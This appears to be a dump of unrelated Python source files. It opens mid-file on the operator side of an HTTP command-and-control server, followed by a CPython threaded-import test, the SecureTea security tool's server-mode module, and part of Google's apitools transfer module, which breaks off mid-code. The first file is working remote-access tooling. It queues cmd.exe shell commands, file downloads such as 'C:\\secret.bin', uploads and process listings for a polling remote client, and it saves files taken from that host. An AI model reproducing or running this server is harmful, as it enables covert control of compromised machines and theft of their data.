# 404 if no valid file
if not os.path.exists(filepath):
self.send_error(404)
return
# Return file
with open(filepath, 'rb') as f:
self.send_response(200)
self.send_header('content-type', 'application/octet-stream')
self.end_headers()
self.wfile.write(f.read())
# Remove file from disk
os.remove(filepath)
return
if commands.empty():
content = 'NOOP'
else:
content = commands.get()
# Return result
self.send_response(200)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write(content)
return
# Result from executing command
def do_POST(self):
global context
# File upload
form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD': 'POST'})
cmd_data = form['cmd'].file.read()
result_filename = form['result'].filename
result_data = form['result'].file.read()
# Show '> ' command input string after command output
if context:
cmd_data = cmd_data.replace(context + ' ', '')
print cmd_data
# Store file
if self.path == '/upload':
# Create folder if required
if not os.path.exists('Downloads'):
os.mkdir('Downloads')
# Write file to disk
with file(os.path.join('Downloads', result_filename), 'wb') as f:
f.write(result_data)
print 'File \'%s\' downloaded.' % result_filename
# Print output
else:
print result_data
sys.stdout.write('%s> ' % context)
# Respond
self.send_response(200)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write('OK')
return
# Do not write log messages to console
def log_message(self, format, *args):
return
def run_httpserver():
#commands.put('GET C:\\secret.bin')
#commands.put('SHELL dir C:\\')
#commands.put('SHELL type client.vbs')
global server
server = HTTPServer(('', PORT_NUMBER), myHandler)
server.serve_forever()
commands = Queue()
server = None
context = ''
variables = {}
def main():
# Start HTTP server thread
#run_httpserver() # Run without treads for debugging purposes
httpserver = Thread(target=run_httpserver)
httpserver.start()
# Loop to add new commands
global context, variables
s = ''
while True:
s = raw_input('%s> ' % context)
s = s.strip()
splitcmd = s.split(' ', 1)
cmd = splitcmd[0].upper()
# In a context
if context == 'SHELL' and cmd != 'CD':
cmd = context
if s.upper() == 'EXIT':
context = ''
continue
else:
args = s
# Ignore empty commands
if not args:
continue
# No context
else:
args = ''
if len(splitcmd) > 1:
args = splitcmd[1]
# Ignore empty commands
if not cmd:
continue
# UPLOAD
elif cmd == 'UPLOAD':
args = args.strip("\"")
# Check file existence
if not os.path.exists(args):
print 'File not found: %s' % args
continue
# Check if LHOST variable is set
if 'LHOST' not in variables:
print 'Variable LHOST not set'
continue
lhost = variables['LHOST']
# Create folder if required
if not os.path.exists('upload'):
os.mkdir('upload')
# Copy file
filename = ntpath.basename(args)
copyfile(args, './upload/%s' % filename)
# Update command and args
cmd = 'WGET'
args = 'http://%s:%d/f/%s' % (lhost, PORT_NUMBER, filename)
# UNSET
elif cmd == 'UNSET':
if args.upper() in variables:
del variables[args.upper()]
continue
# SHELL
elif cmd == 'SHELL' and not args:
context = 'SHELL'
continue
# SET
elif cmd == 'SET':
if args:
(variable, value) = args.split(' ')
variables[variable.upper()] = value
else:
print '\n'.join('%s: %s' % (key, value) for key,value in variables.iteritems())
continue
# HELP
elif cmd == 'HELP':
print 'Supported commands:\n' \
'- CD [directory] - Change directory. Shows current directory when without parameter.\n' \
'- DOWNLOAD [path] - Download the file at [path] to the .\\Downloads folder.\n' \
'- GETUID - Get shell user id.\n' \
'- GETWD - Get working directory. Same as CD.\n' \
'- HELP - Show this help.\n' \
'- IFCONFIG - Show network configuration.\n' \
'- KILL - Stop script on the remote host.\n' \
'- PS - Show process list.\n' \
'- PWD - Same as GETWD and CD.\n' \
'- SET [name] [value] - Set a variable, for example SET LHOST 192.168.1.77.\n' \
' When entered without parameters, it shows the currently set variables.\n' \
'- SHELL [command] - Execute command in cmd.exe interpreter;\n' \
' When entered without command, switches to SHELL context.\n' \
'- SHUTDOWN - Exit this commandline interface (does not shutdown the client).\n' \
'- SYSINFO - Show sytem information.\n' \
'- SLEEP [ms] - Set client polling interval;\n' \
' When entered without ms, shows the current interval.\n' \
'- UNSET [name] - Unset a variable\n' \
'- UPLOAD [localpath] - Upload the file at [path] to the remote host.\n' \
' Note: Variable LHOST is required.\n' \
'- WGET [url] - Download file from url.\n'
continue
# SHUTDOWN
elif cmd == 'SHUTDOWN':
server.shutdown()
if os.path.exists('./upload'):
rmtree('./upload')
print 'Shutting down %s' % os.path.basename(__file__)
exit(0)
commands.put(' '.join([cmd, args]))
if __name__ == '__main__':
main()
|
test_threaded_import.py
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import threading
import unittest
from unittest import mock
from test.support import (verbose, run_unittest)
from test.support.import_helper import forget
from test.support.os_helper import (TESTFN, unlink, rmtree)
from test.support import threading_helper
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(threading.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
def mock_register_at_fork(func):
# bpo-30599: Mock os.register_at_fork() when importing the random module,
# since this function doesn't allow to unregister callbacks and would leak
# memory.
return mock.patch('os.register_at_fork', create=True)(func)
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
"""A dummy finder to detect concurrent access to its find_spec()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = threading.Lock()
def find_spec(self, name, path=None, target=None):
# Simulate some thread-unsafe behaviour. If calls to find_spec()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
assert imp.lock_held()
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.01)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_spec(self, name, path=None, target=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
@mock_register_at_fork
def check_parallel_module_init(self, mock_os):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
t0 = time.monotonic()
with threading_helper.start_threads(
threading.Thread(target=task, args=(N, done, done_tasks, errors,))
for i in range(N)):
pass
completed = done.wait(10 * 60)
dt = time.monotonic() - t0
if verbose:
print("%.1f ms" % (dt*1e3), flush=True, end=" ")
dbg_info = 'done: %s/%s' % (len(done_tasks), N)
self.assertFalse(errors, dbg_info)
self.assertTrue(completed, dbg_info)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.insert(0, finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_spec('')
raise ImportError
sys.path_hooks.insert(0, path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_spec('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.test_importlib.threaded_import_hangers']
except KeyError:
pass
import test.test_importlib.threaded_import_hangers
self.assertFalse(test.test_importlib.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(forget, name)
importlib.invalidate_caches()
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
@mock_register_at_fork
def test_side_effect_import(self, mock_os):
code = """if 1:
import threading
def target():
import random
t = threading.Thread(target=target)
t.start()
t.join()
t = None"""
sys.path.insert(0, os.curdir)
self.addCleanup(sys.path.remove, os.curdir)
filename = TESTFN + ".py"
with open(filename, "wb") as f:
f.write(code.encode('utf-8'))
self.addCleanup(unlink, filename)
self.addCleanup(forget, TESTFN)
self.addCleanup(rmtree, '__pycache__')
importlib.invalidate_caches()
__import__(TESTFN)
del sys.modules[TESTFN]
@threading_helper.reap_threads
def test_main():
old_switchinterval = None
try:
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
except AttributeError:
pass
try:
run_unittest(ThreadedImportTests)
finally:
if old_switchinterval is not None:
sys.setswitchinterval(old_switchinterval)
if __name__ == "__main__":
test_main()
|
server_mode.py
|
# -*- coding: utf-8 -*-
u"""Server Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 28 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for server mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.firewall import secureTeaFirewall
from securetea import logger
import multiprocessing
import sys
class ServerMode(object):
"""ServerMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize ServerMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
Returns
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
sys.exit(0)
# Initialize objects presence as false
self.firewall = False
self.ids = False
self.antivirus = False
self.auto_server_patcher = False
self.web_deface = False
self.server_log = False
self.system_log = False
# Initialize empty process pool list
self.process_pool = list()
def create_objects(self):
"""
Create module (Firewall, IDS, AntiVirus,
Auto Server Patcher, Web Deface) objects if
configuraton parameters are available for those.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing IDS object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized IDS object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("auto_server_patcher"):
try:
self.logger.log(
"Initializing patcher object"
)
# Initialize Patcher object
self.patcher_obj = SecureTeaAutoServerPatcher(debug=self.debug,
cred=self.cred["auto_server_patcher"])
self.auto_server_patcher = True
self.logger.log(
"Initialized patcher object"
)
except KeyError:
self.logger.log(
"Auto server patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("antivirus"):
try:
# Initialize AntiVirus object
self.logger.log(
"Initializing AntiVirus object",
logtype="info"
)
# Initialize AntiVirus object
self.antivirus_obj = SecureTeaAntiVirus(debug=self.debug,
cred=self.cred["antivirus"])
self.antivirus = True
self.logger.log(
"Initialized AntiVirus object",
logtype="info"
)
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
# Only debug configuratons are required for System Log Monitor, hnece create them plainly
try:
self.logger.log(
"Initializing System Log Monitor object",
logtype="info"
)
# Initialize SystemLogEngine object
self.system_log_obj = engine.SystemLogEngine(debug=self.debug)
self.system_log = True
self.logger.log(
"Initialized System Log Monitor object",
logtype="info"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("web_deface"):
try:
self.logger.log(
"Initializing Web Deface object",
logtype="info"
)
# Initialize WebDeface object
self.web_deface_obj = WebDeface(debug=self.debug,
path=self.cred['web_deface']['path'],
server_name=self.cred['web_deface']['server-name'])
self.web_deface = True
self.logger.log(
"Initialized Web Deface object",
logtype="info"
)
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("server_log"):
try:
self.logger.log(
"Initializing Server Log Monitor object",
logtype="info"
)
server_cred = self.cred['server_log']
# Initialize Server Log Monitor object
self.server_log_obj = SecureTeaServerLog(debug=self.debug,
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
self.server_log = True
self.logger.log(
"Initialized Server Log Monitor object",
logtype="info"
)
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
Create process for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.auto_server_patcher: # if Auto Server Patcher is initialized
auto_server_patcher_process = multiprocessing.Process(target=self.patcher_obj.start)
self.process_pool.append(auto_server_patcher_process)
if self.antivirus: # if AntiVirus object is initialized
antivirus_process = multiprocessing.Process(target=self.antivirus_obj.start)
self.process_pool.append(antivirus_process)
if self.web_deface: # if Web Deface object is initialized
web_deface_process = multiprocessing.Process(target=self.web_deface_obj.start)
self.process_pool.append(web_deface_process)
if self.system_log: # if System Log Monitor object is initialized
system_log_process = multiprocessing.Process(target=self.system_log_obj.run)
self.process_pool.append(system_log_process)
if self.server_log: # if Server Log Monitor object is initialized
server_log_process = multiprocessing.Process(target=self.server_log_obj.run)
self.process_pool.append(server_log_process)
def start_process(self):
"""
Start all the process in the process pool
and terminate gracefully in Keyboard Interrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_server_mode(self):
"""
Start SecureTea in server mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
|
transfer.py
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Upload and download support for apitools."""
from __future__ import print_function
import email.generator as email_generator
import email.mime.multipart as mime_multipart
import email.mime.nonmultipart as mime_nonmultipart
import io
import json
import mimetypes
import os
import threading
import six
from six.moves import http_client
from apitools.base.py import buffered_stream
from apitools.base.py import exceptions
from apitools.base.py import http_wrapper
from apitools.base.py import stream_slice
from apitools.base.py import util
__all__ = [
'Download',
'Upload',
'RESUMABLE_UPLOAD',
'SIMPLE_UPLOAD',
'DownloadProgressPrinter',
'DownloadCompletePrinter',
'UploadProgressPrinter',
'UploadCompletePrinter',
]
_RESUMABLE_UPLOAD_THRESHOLD = 5 << 20
SIMPLE_UPLOAD = 'simple'
RESUMABLE_UPLOAD = 'resumable'
def DownloadProgressPrinter(response, unused_download):
"""Print download progress based on response."""
if 'content-range' in response.info:
print('Received %s' % response.info['content-range'])
else:
print('Received %d bytes' % response.length)
def DownloadCompletePrinter(unused_response, unused_download):
"""Print information about a completed download."""
print('Download complete')
def UploadProgressPrinter(response, unused_upload):
"""Print upload progress based on response."""
print('Sent %s' % response.info['range'])
def UploadCompletePrinter(unused_response, unused_upload):
"""Print information about a completed upload."""
print('Upload complete')
class _Transfer(object):
"""Generic bits common to Uploads and Downloads."""
def __init__(self, stream, close_stream=False, chunksize=None,
auto_transfer=True, http=None, num_retries=5):
self.__bytes_http = None
self.__close_stream = close_stream
self.__http = http
self.__stream = stream
self.__url = None
self.__num_retries = 5
# Let the @property do validation
self.num_retries = num_retries
self.retry_func = (
http_wrapper.HandleExceptionsAndRebuildHttpConnections)
self.auto_transfer = auto_transfer
self.chunksize = chunksize or 1048576
def __repr__(self):
return str(self)
@property
def close_stream(self):
return self.__close_stream
@property
def http(self):
return self.__http
@property
def bytes_http(self):
return self.__bytes_http or self.http
@bytes_http.setter
def bytes_http(self, value):
self.__bytes_http = value
@property
def num_retries(self):
return self.__num_retries
@num_retries.setter
def num_retries(self, value):
util.Typecheck(value, six.integer_types)
if value < 0:
raise exceptions.InvalidDataError(
'Cannot have negative value for num_retries')
self.__num_retries = value
@property
def stream(self):
return self.__stream
@property
def url(self):
return self.__url
def _Initialize(self, http, url):
"""Initialize this download by setting self.http and self.url.
We want the user to be able to override self.http by having set
the value in the constructor; in that case, we ignore the provided
http.
Args:
http: An httplib2.Http instance or None.
url: The url for this transfer.
Returns:
None. Initializes self.
"""
self.EnsureUninitialized()
if self.http is None:
self.__http = http or http_wrapper.GetHttp()
self.__url = url
@property
def initialized(self):
return self.url is not None and self.http is not None
@property
def _type_name(self):
return type(self).__name__
def EnsureInitialized(self):
if not self.initialized:
raise exceptions.TransferInvalidError(
'Cannot use uninitialized %s', self._type_name)
def EnsureUninitialized(self):
if self.initialized:
raise exceptions.TransferInvalidError(
'Cannot re-initialize %s', self._type_name)
def __del__(self):
if self.__close_stream:
self.__stream.close()
def _ExecuteCallback(self, callback, response):
# TODO(craigcitro): Push these into a queue.
if callback is not None:
threading.Thread(target=callback, args=(response, self)).start()
class Download(_Transfer):
"""Data for a single download.
Public attributes:
chunksize: default chunksize to use for transfers.
"""
_ACCEPTABLE_STATUSES = set((
http_client.OK,
http_client.NO_CONTENT,
http_client.PARTIAL_CONTENT,
http_client.REQUESTED_RANGE_NOT_SATISFIABLE,
))
_REQUIRED_SERIALIZATION_KEYS = set((
'auto_transfer', 'progress', 'total_size', 'url'))
def __init__(self, stream, progress_callback=None, finish_callback=None,
**kwds):
total_size = kwds.pop('total_size', None)
super(Download, self).__init__(stream, **kwds)
self.__initial_response = None
self.__progress = 0
self.__total_size = total_size
self.__encoding = None
self.progress_callback = progress_callback
self.finish_callback = finish_callback
@property
def progress(self):
return self.__progress
@property
def encoding(self):
return self.__encoding
@classmethod
def FromFile(cls, filename, overwrite=False, auto_transfer=True, **kwds):
"""Create a new download object from a filename."""
path = os.path.expanduser(filename)
if os.path.exists(path) and not overwrite:
raise exceptions.InvalidUserInputError(
'File %s exists and overwrite not specified' % path)
return cls(open(path, 'wb'), close_stream=True,
auto_transfer=auto_transfer, **kwds)
@classmethod
def FromStream(cls, stream, auto_transfer=True, total_size=None, **kwds):
"""Create a new Download object from a stream."""
return cls(stream, auto_transfer=auto_transfer, total_size=total_size,
**kwds)
@classmethod
def FromData(cls, stream, json_data, http=None, auto_transfer=None,
**kwds):
"""Create a new Download object from a stream and serialized data."""
info = json.loads(json_data)
missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys())
if missing_keys:
raise exceptions.InvalidDataError(
'Invalid serialization data, missing keys: %s' % (
', '.join(missing_keys)))
download = cls.FromStream(stream, **kwds)
if auto_transfer is not None:
download.auto_transfer = auto_transfer
else:
download.auto_transfer = info['auto_transfer']
setattr(download, '_Download__progress', info['progress'])
setattr(download, '_Download__total_size', info['total_size'])
download._Initialize( # pylint: disable=protected-access
http, info['url'])
return download
@property
def serialization_data(self):
self.EnsureInitialized()
return {
'auto_transfer': self.auto_transfer,
'progress': self.progress,
'total_size': self.total_size,
'url': self.url,
}
@property
def total_size(self):
return self.__total_size
def __str__(self):
if not self.initialized:
return 'Download (uninitialized)'
else:
return 'Download with %d/%s bytes transferred from url %s' % (
self.progress, self.total_size, self.url)
def ConfigureRequest(self, http_request, url_builder):
url_builder.query_params['alt'] = 'media'
# TODO(craigcitro): We need to send range requests because by
# default httplib2 stores entire reponses in memory. Override
# httplib2's download method (as gsutil does) so that this is not
# necessary.
http_request.headers['Range'] = 'bytes=0-%d' % (self.chunksize - 1,)
def __SetTotal(self, info):
if 'content-range' in info:
_, _, total = info['content-range'].rpartition('/')
if total != '*':
self.__total_size = int(total)
# Note "total_size is None" means we don't know it; if no size
# info was returned on our initial range request, that means we
# have a 0-byte file. (That last statement has been verified
# empirically, but is not clearly documented anywhere.)
if self.total_size is None:
self.__total_size = 0
def InitializeDownload(self, http_request, http=None, client=None):
"""Initialize this download by making a request.
Args:
http_request: The HttpRequest to use to initialize this download.
http: The httplib2.Http instance for this request.
client: If provided, let this client process the final URL before
sending any additional requests. If client is provided and
http is not, client.http will be used instead.
"""
self.EnsureUninitialized()
if http is None and client is None:
raise exceptions.UserError('Must provide client or http.')
http = http or client.http
if client is not None:
http_request.url = client.FinalizeTransferUrl(http_request.url)
url = http_request.url
if self.auto_transfer:
end_byte = self.__ComputeEndByte(0)
self.__SetRangeHeader(http_request, 0, end_byte)
response = http_wrapper.MakeRequest(
self.bytes_http or http, http_request)
if response.status_code not in self._ACCEPTABLE_STATUSES:
raise exceptions.HttpError.FromResponse(response)
self.__initial_response = response
self.__SetTotal(response.info)
url = response.info.get('content-location', response.request_url)
if client is not None:
url = client.FinalizeTransferUrl(url)
self._Initialize(http, url)
# Unless the user has requested otherwise, we want to just
# go ahead and pump the bytes now.
if self.auto_transfer:
self.StreamInChunks()
def __NormalizeStartEnd(self, start, end=None):
if end is not None:
if start < 0:
raise exceptions.TransferInvalidError(
'Cannot have end index with negative start index')
elif start >= self.total_size:
raise exceptions.TransferInvalidError(
'Cannot have start index greater than total size')
end = min(end, self.total_size - 1)
if end < start:
raise exceptions.TransferInvalidError(
'Range requested with end[%s] < start[%s]' % (end, start))
return start, end
else:
if start < 0:
start = max(0, start + self.total_size)
return start, self.total_size - 1
def __SetRangeHeader(self, request, start, end=None):
if start < 0:
request.headers['range'] = 'bytes=%d' % start
elif end is None:
request.headers['range'] = 'bytes=%d-' % start
else:
request.headers['range'] = 'bytes=%d-%d' % (start, end)
def __ComputeEndByte(self, start, end=None, use_chunks=True):
"""Compute the last byte to fetch for this request.
This is all based on the HTTP spec for Range and
Content-Range.
Note that this is potentially confusing in several ways:
* the value for the last byte is 0-based, eg "fetch 10 bytes
from the beginning" would return 9 here.
* if we have no information about size, and don't want to
use the chunksize, we'll return None.
See the tests for more examples.
Args:
start: byte to start at.
end: (int or None, default: None) Suggested last byte.
use_chunks: (bool, default: True) If False, ignore self.chunksize.
Returns:
Last byte to use in a Range header, or None.
"""
end_byte = end
if start < 0 and not self.total_size:
return end_byte
if use_chunks:
alternate = start + self.chunksize - 1
if end_byte is not None:
end_byte = min(end_byte, alternate)
else:
end_byte = alternate
if self.total_size:
alternate = self.total_size - 1
if end_byte is not None:
end_byte = min(end_byte, alternate)
else:
end_byte = alternate
return end_byte
def __GetChunk(self, start, end, additional_headers=None):
"""Retrieve a chunk, and return the full response."""
self.EnsureInitialized()
request = http_wrapper.Request(url=self.url)
self.__SetRangeHeader(request, start, end=end)
if additional_headers is not None:
request.headers.update(additional_headers)
return http_wrapper.MakeRequest(
self.bytes_http, request, retry_func=self.retry_func,
retries=self.num_retries)
def __ProcessResponse(self, response):
"""Process response (by updating self and writing to self.stream)."""
if response.status_code not in self._ACCEPTABLE_STATUSES:
# We distinguish errors that mean we made a mistake in setting
# up the transfer versus something we should attempt again.
if response.status_code in (http_client.FORBIDDEN,
http_client.NOT_FOUND):
raise exceptions.HttpError.FromResponse(response)
else:
raise exceptions.TransferRetryError(response.content)
if response.status_code in (http_client.OK,
http_client.PARTIAL_CONTENT):
self.stream.write(response.content)
self.__progress += response.length
if response.info and 'content-encoding' in response.info:
# TODO(craigcitro): Handle the case where this changes over a
# download.
self.__encoding = response.info['content-encoding']
elif response.status_code == http_client.NO_CONTENT:
# It's important to write something to the stream for the case
# of a 0-byte download to a file, as otherwise python won't
# create the file.
self.stream.write('')
return response
def GetRange(self, start, end=None, additional_headers=None,
use_chunks=True):
"""Retrieve a given byte range from this download, inclusive.
Range must be of one of these three forms:
* 0 <= start, end = None: Fetch from start to the end of the file.
* 0 <= start <= end: Fetch the bytes from start to end.
* start < 0, end = None: Fetch the last -start bytes of the file.
(These variations correspond to those described in the HTTP 1.1
protocol for range headers in RFC 2616, sec. 14.35.1.)
Args:
start: (int) Where to start fetching bytes. (See above.)
end: (int, optional) Where to stop fetching bytes. (See above.)
additional_headers: (bool, optional) Any additional headers to
pass with the request.
use_chunks: (bool, default: True) If False, ignore self.chunksize
and fetch this range in a single request.
Returns:
None. Streams bytes into self.stream.
"""
self.EnsureInitialized()
progress_end_normalized = False
if self.total_size is not None:
progress, end_byte = self.__NormalizeStartEnd(start, end)
progress_end_normalized = True
else:
progress = start
end_byte = end
while (not progress_end_normalized or end_byte is None or
progress <= end_byte):
end_byte = self.__ComputeEndByte(progress, end=end_byte,
use_chunks=use_chunks)
response = self.__GetChunk(progress, end_byte,
additional_headers=additional_headers)
if not progress_end_normalized:
self.__SetTotal(response.info)
progress, end_byte = self.__NormalizeStartEnd(start, end)
progress_end_normalized = True
response = self.__ProcessResponse(response)
progress += response.length
if response.length == 0:
raise exceptions.TransferRetryError(
'Zero bytes unexpectedly returned in download response')
def StreamInChunks(self, callback=None, finish_callback=None,
additional_headers=None):
"""Stream the entire download in chunks."""
self.StreamMedia(callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers,
use_chunks=True)
def StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None, use_chunks=True):
"""Stream the entire download.
Args:
callback: (default: None) Callback to call as each chunk is
completed.
finish_callback: (default: None) Callback to call when the
download is complete.
additional_headers: (default: None) Additional headers to
include in fetching bytes.
use_chunks: (bool, default: True) If False, ignore self.chunksize
and stream this download in a single request.
Returns:
None. Streams bytes into self.stream.
"""
callback = callback or self.progress_callback
finish_callback = finish_callback or self.finish_callback
self.EnsureInitialized()
while True:
if self.__initial_response is not None:
response = self.__initial_response
self.__initial_response = None
else:
end_byte = self.__ComputeEndByte(self.progress,
use_chunks=use_chunks)
response = self.__GetChunk(
self.progress, end_byte,
additional_headers=additional_headers)
if self.total_size is None:
self.__SetTotal(response.info)
response = self.__ProcessResponse(response)
self._ExecuteCallback(callback, response)
if (response.status_code == http_client.OK or
self.progress >= self.total_size):
break
self._ExecuteCallback(finish_callback, response)
class Upload(_Transfer):
"""Data for a single Upload.
Fields:
stream: The stream to upload.
mime_type: MIME type of the upload.
total_size: (optional) Total upload size for the stream.
close_stream: (default: False) Whether or not we should close the
stream when finished with the upload.
auto_transfer: (default: True) If True, stream all bytes as soon as
the upload is created.
"""
_REQUIRED_SERIALIZATION_KEYS = set((
'auto_transfer', 'mime_type', 'total_size', 'url'))
def __init__(self, stream, mime_type, total_size=None, http=None,
close_stream=False, chunksize=None, auto_transfer=True,
progress_callback=None, finish_callback=None,
**kwds):
super(Upload, self).__init__(
stream, close_stream=close_stream, chunksize=chunksize,
